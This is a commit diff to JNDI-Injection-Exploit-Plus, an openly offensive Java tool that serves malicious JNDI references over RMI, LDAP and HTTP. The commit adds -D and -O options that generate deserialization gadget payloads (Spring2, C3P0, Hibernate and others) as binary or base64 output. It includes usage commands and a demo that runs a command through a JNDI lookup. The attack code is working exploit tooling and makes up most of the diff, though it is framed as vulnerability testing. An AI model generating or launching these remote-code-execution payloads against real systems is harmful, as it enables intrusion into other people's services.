add -D -O func

Author: cckuailong

README.md

@@ -2,7 +2,7 @@
 
 ## Description
 
-JNDI-Injection-Exploit-Plus is a tool for generating workable JNDI links and provide background services by starting RMI server,LDAP server and HTTP server. 
+JNDI-Injection-Exploit-Plus is a tool for generating **workable JNDI links** and provide background services by starting RMI server,LDAP server and HTTP server. 
 
 Using this tool allows you get JNDI links, you can insert these links into your **POC** to test vulnerability. 
 
@@ -14,6 +14,8 @@ For example, this is a Fastjson vul-poc:
 
 We can replace  "rmi://127.0.0.1:1099/Object" with the link generated by JNDI-Injection-Exploit-Plus to test vulnerability. 
 
+What's more, you can also use JNDI-Injection-Exploit-Plus to **generate binary/base64 type of payloads** like [ysoserial](https://github.com/frohoff/ysoserial)
+
 ## More than [JNDI-Injection-Exploit](https://github.com/welk1n/JNDI-Injection-Exploit)
 
 [JNDI-Injection-Exploit](https://github.com/welk1n/JNDI-Injection-Exploit) is a great tool, this is the plus version of it.
@@ -76,12 +78,20 @@ Vaadin1             |@kai_ullrich                |vaadin-server:7.7.14, vaadin-s
 Wicket1             |@jacob-baines               |wicket-util:6.23.0, slf4j-api:1.6.4
 WildFly1            |@hugow                      |org.wildfly:wildfly-connector:26.0.1.Final
 
+#### 4. generate and export payloads
+
+Like [ysoserial](https://github.com/frohoff/ysoserial).
+
+You can generate the deserialization payloads with binary or base64 type of output
+
 ## Usage
 
- Run as
+### JNDI Links
+
+Run as
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-1.1-SNAPSHOT-all.jar [-C] [command] [-A] [address]
+$ java -jar JNDI-Injection-Exploit-Plus-1.3-SNAPSHOT-all.jar [-C] [command] [-A] [address]
 ```
 
 where:
@@ -106,14 +116,32 @@ Points for attention:
 
   **Command in bash like "bash -c ...." need to add Double quotes.**
 
+### Deserialization Payloads
+
+Run as
+
+```shell
+$ java -jar JNDI-Injection-Exploit-Plus-1.3-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64]
+```
+
+where:
+- **-C** - command executed in the remote classfile.
+
+  (optional , default command is "open /Applications/Calculator.app")
+
+- **-D** - The deserial Gadget payload name.
+- **-O** - (Optional) The deserial output type, default is binary
+
 ## Examples
 
- Local demo:
+### JNDI Links
+
+Local demo:
 
 1. Start the tool like this:
 
    ```shell
-   $ java -jar JNDI-Injection-Exploit-Plus-1.1-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
+   $ java -jar JNDI-Injection-Exploit-Plus-1.3-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
    ```
 
     Screenshot:
@@ -125,9 +153,11 @@ Points for attention:
    In this example, it looks like this:
 
    ```java
-   public static void main(String[] args) throws Exception{
-       InitialContext ctx = new InitialContext();
-       ctx.lookup("rmi://127.0.0.1:1099/remoteExploit8");
+   class Test{
+       public static void main(String[] args) throws Exception{
+           InitialContext ctx = new InitialContext();
+           ctx.lookup("rmi://127.0.0.1:1099/remoteExploit8");
+       }
    }
    ```
 
@@ -139,6 +169,16 @@ Points for attention:
 
 For More Examples: [Test-JNDI-Injection-Exploit-Plus](https://github.com/cckuailong/Test-JNDI-Injection-Exploit-Plus)
 
+### Deserialization Payloads
+
+```shell
+$ java -jar JNDI-Injection-Exploit-Plus-1.3-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
+```
+
+Base64 Output Result:
+
+![](./img/3.png)
+
 ## Installation
 
 We can select one of the two methods to get the jar.

img/3.png

@@ -6,7 +6,7 @@
 
     <groupId>cckuailong</groupId>
     <artifactId>JNDI-Injection-Exploit-Plus</artifactId>
-    <version>1.2-SNAPSHOT</version>
+    <version>1.3-SNAPSHOT</version>
 
     <properties>
         <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>

pom.xml

@@ -15,8 +15,8 @@ public CommonDeserial(URL codebase, String command){
     }
 
     public byte[] execByDeserialize(String gadgetType) throws Exception {
-        byte[] bytes = null;
-        System.out.println(gadgetType);
+        byte[] bytes = {};
+//        System.out.println(gadgetType);
         switch (gadgetType){
             case "CommonsBeanutils1":
                 bytes = CommonsBeanutils1.getBytes(command);
@@ -61,7 +61,11 @@ public byte[] execByDeserialize(String gadgetType) throws Exception {
                 bytes = BeanShell1.getBytes(command);
                 break;
             case "C3P0":
-                bytes = C3P0.getBytes(codebase);
+                if (codebase != null){
+                    bytes = C3P0.getBytes(codebase);
+                }else{
+                    System.out.println("Gadget " + gadgetType + "'s Payload Need to be URL(http/https)");
+                }
                 break;
             case "Click1":
                 bytes = Click1.getBytes(command);
@@ -79,7 +83,11 @@ public byte[] execByDeserialize(String gadgetType) throws Exception {
                 bytes = Hibernate1.getBytes(command);
                 break;
             case "Hibernate2":
-                bytes = Hibernate2.getBytes(codebase);
+                if (codebase != null){
+                    bytes = Hibernate2.getBytes(codebase);
+                }else{
+                    System.out.println("Gadget " + gadgetType + "'s Payload Need to be URL(http/https)");
+                }
                 break;
             case "JavassistWeld1":
                 bytes = JavassistWeld1.getBytes(command);
@@ -103,7 +111,11 @@ public byte[] execByDeserialize(String gadgetType) throws Exception {
                 bytes = Myfaces1.getBytes(command);
                 break;
             case "Myfaces2":
-                bytes = Myfaces2.getBytes(codebase);
+                if (codebase != null){
+                    bytes = Myfaces2.getBytes(codebase);
+                }else{
+                    System.out.println("Gadget " + gadgetType + "'s Payload Need to be URL(http/https)");
+                }
                 break;
             case "ROME1":
                 bytes = ROME1.getBytes(command);
@@ -118,7 +130,11 @@ public byte[] execByDeserialize(String gadgetType) throws Exception {
                 bytes = Spring2.getBytes(command);
                 break;
             case "Spring3":
-                bytes = Spring3.getBytes(codebase);
+                if (codebase != null){
+                    bytes = Spring3.getBytes(codebase);
+                }else{
+                    System.out.println("Gadget " + gadgetType + "'s Payload Need to be URL(http/https)");
+                }
                 break;
             case "URLDNS":
                 bytes = URLDNS.getBytes(command);
@@ -130,13 +146,18 @@ public byte[] execByDeserialize(String gadgetType) throws Exception {
                 bytes = Wicket1.getBytes(command);
                 break;
             case "WildFly1":
-                bytes = WildFly1.getBytes(codebase);
+                if (codebase != null){
+                    bytes = WildFly1.getBytes(codebase);
+                }else{
+                    System.out.println("Gadget " + gadgetType + "'s Payload Need to be URL(http/https)");
+                }
                 break;
 
             default:
+                System.out.println("No such Deserial Payload Name");
                 break;
         }
-        System.out.println("Base64 Payload: " + Base64.getEncoder().encodeToString(bytes));
+//        System.out.println("Base64 Payload: " + Base64.getEncoder().encodeToString(bytes));
 
         return bytes;
     }

src/main/java/jndi/CommonDeserial.java

@@ -1,16 +1,23 @@
 package run;
 
+import common.Strings;
 import jetty.JettyServer;
+import jndi.CommonDeserial;
 import jndi.LDAPRefServer;
 import jndi.RMIRefServer;
 import org.apache.commons.cli.*;
 import org.apache.commons.lang3.StringUtils;
+import payloads.ObjectPayload;
+import payloads.annotation.Authors;
+import payloads.annotation.Dependencies;
 
+import java.io.ObjectOutputStream;
+import java.io.PrintStream;
+import java.io.PrintWriter;
 import java.net.*;
 import java.text.DateFormat;
 import java.text.SimpleDateFormat;
-import java.util.Date;
-import java.util.Enumeration;
+import java.util.*;
 
 import static util.Mapper.*;
 
@@ -36,39 +43,87 @@ public static void main(String[] args) throws Exception{
 
         CommandLineParser parser = new DefaultParser();
         CommandLine cmd = null;
+        Options opts = null;
         //default command
         String[] cmdArray = {"open","/Applications/Calculator.app"};
+        String deserial = "";
+        String deserialOutput = "bin";
+
 
         try{
-            cmd = parser.parse(cmdlineOptions(),args);
+            opts = cmdlineOptions();
+            cmd = parser.parse(opts, args);
         }catch (Exception e){
             System.err.println("Cmdlines parse failed.");
+            printBasicUsage(opts);
             System.exit(1);
         }
-        if(cmd.hasOption("C")) {
+        if (cmd.hasOption("help")) {
+            printBasicUsage(opts);
+            return;
+        }
+        if (cmd.hasOption("C")) {
             cmdArray = cmd.getOptionValues('C');
         }
-        if(cmd.hasOption("A")) {
+        if (cmd.hasOption("A")) {
             addr = cmd.getOptionValue('A');
         }
+        if (cmd.hasOption("D")) {
+            deserial = cmd.getOptionValue('D');
+        }
+        if (cmd.hasOption("O")) {
+            deserialOutput = cmd.getOptionValue('O');
+            if(!(deserialOutput.equals("bin") || deserialOutput.equals("base64"))){
+                System.out.println("Error in param -O, you can only select bin / base64");
+                return;
+            }
+        }
 
-        ServerStart servers = new ServerStart(new URL("http://"+ addr +":"+ jettyPort +"/"),StringUtils.join(cmdArray," "));
-        System.out.println("[rmiADDRESS] >> " + "rmi://" + addr + ":" + rmiPort);
-        System.out.println("[ldapADDRESS] >> " + "rmi://" + addr + ":" + ldapPort);
-        System.out.println("[COMMAND] >> " + withColor(StringUtils.join(cmdArray," "),ANSI_BLUE));
-        Class.forName("util.Mapper");
+        if (deserial.length() == 0) {
+            ServerStart servers = new ServerStart(new URL("http://"+ addr +":"+ jettyPort +"/"),StringUtils.join(cmdArray," "));
+            System.out.println("[rmiADDRESS] >> " + "rmi://" + addr + ":" + rmiPort);
+            System.out.println("[ldapADDRESS] >> " + "rmi://" + addr + ":" + ldapPort);
+            System.out.println("[COMMAND] >> " + withColor(StringUtils.join(cmdArray," "),ANSI_BLUE));
+            Class.forName("util.Mapper");
 
-        System.out.println("----------------------------Server Log----------------------------");
-        System.out.println(getLocalTime() + " [JETTYSERVER]>> Listening on 0.0.0.0:" + jettyPort);
-        Thread threadJetty = new Thread(servers.jettyServer);
-        threadJetty.start();
+            System.out.println("----------------------------Server Log----------------------------");
+            System.out.println(getLocalTime() + " [JETTYSERVER]>> Listening on 0.0.0.0:" + jettyPort);
+            Thread threadJetty = new Thread(servers.jettyServer);
+            threadJetty.start();
 
-        System.out.println(getLocalTime() + " [RMISERVER]  >> Listening on 0.0.0.0:" + rmiPort);
-        Thread threadRMI = new Thread(servers.rmiRefServer);
-        threadRMI.start();
+            System.out.println(getLocalTime() + " [RMISERVER]  >> Listening on 0.0.0.0:" + rmiPort);
+            Thread threadRMI = new Thread(servers.rmiRefServer);
+            threadRMI.start();
 
-        Thread threadLDAP = new Thread(servers.ldapRefServer);
-        threadLDAP.start();
+            Thread threadLDAP = new Thread(servers.ldapRefServer);
+            threadLDAP.start();
+        }
+        else{
+            String cmdStr = String.join(" ", cmdArray);
+            URL codebase;
+            if (cmdStr.startsWith("http")){
+                codebase = new URL(cmdStr);
+            }else{
+                codebase = null;
+            }
+            CommonDeserial commonDeserial = new CommonDeserial(codebase, cmdStr);
+            byte[] deserialBytes = commonDeserial.execByDeserialize(deserial);
+            if (deserialBytes.length == 0) {
+                System.out.println("Error in Deserialization, Please use the correct payload name.");
+                printDeserialUsage();
+                return;
+            }
+            if (deserialOutput.equals("bin")) {
+                PrintStream out = System.out;
+                final ObjectOutputStream objOut = new ObjectOutputStream(out);
+                objOut.writeObject(deserialBytes);
+            }
+            else if (deserialOutput.equals("base64")){
+                System.out.print(Base64.getEncoder().encodeToString(deserialBytes));
+            }else{
+                System.out.println("Error in param -O, you can only select bin / base64");
+            }
+        }
 
     }
 
@@ -90,11 +145,18 @@ public ServerStart(URL codebase, String cmd) throws Exception{
 
     public static Options cmdlineOptions(){
         Options opts = new Options();
+        Option help = new Option("help",false,"Show the help info.");
+        opts.addOption(help);
         Option c = new Option("C",true,"The command executed in remote .class.");
         c.setArgs(Option.UNLIMITED_VALUES);
         opts.addOption(c);
         Option addr = new Option("A",true,"The address of server(ip or domain).");
         opts.addOption(addr);
+        Option deserial = new Option("D",true,"The deserial payload name");
+        opts.addOption(deserial);
+        Option deserialOutput = new Option("O",true,"The deserial output type, default is bin");
+        opts.addOption(deserialOutput);
+
         return opts;
     }
 
@@ -143,4 +205,38 @@ public static String withColor(String str,String color){
         return str;
     }
 
+    private static void printBasicUsage(Options opts){
+        System.out.println();
+        HelpFormatter formatter = new HelpFormatter();
+        formatter.printHelp("Have fun with JNDI-Injection-Exploit-Plus", opts);
+        System.out.println();
+        printDeserialUsage();
+    }
+
+    private static void printDeserialUsage() {
+        System.out.println();
+        System.out.println("JNDI-Injection-Exploit-Plus Available Deserialization Payloads:");
+
+        final List<Class<? extends ObjectPayload>> payloadClasses =
+                new ArrayList<Class<? extends ObjectPayload>>(ObjectPayload.Utils.getPayloadClasses());
+        Collections.sort(payloadClasses, new Strings.ToStringComparator()); // alphabetize
+
+        final List<String[]> rows = new LinkedList<String[]>();
+        rows.add(new String[] {"Payload", "Authors", "Dependencies"});
+        rows.add(new String[] {"-------", "-------", "------------"});
+        for (Class<? extends ObjectPayload> payloadClass : payloadClasses) {
+            rows.add(new String[] {
+                    payloadClass.getSimpleName(),
+                    Strings.join(Arrays.asList(Authors.Utils.getAuthors(payloadClass)), ", ", "@", ""),
+                    Strings.join(Arrays.asList(Dependencies.Utils.getDependenciesSimple(payloadClass)),", ", "", "")
+            });
+        }
+
+        final List<String> lines = Strings.formatTable(rows);
+
+        for (String line : lines) {
+            System.err.println("     " + line);
+        }
+    }
+
 }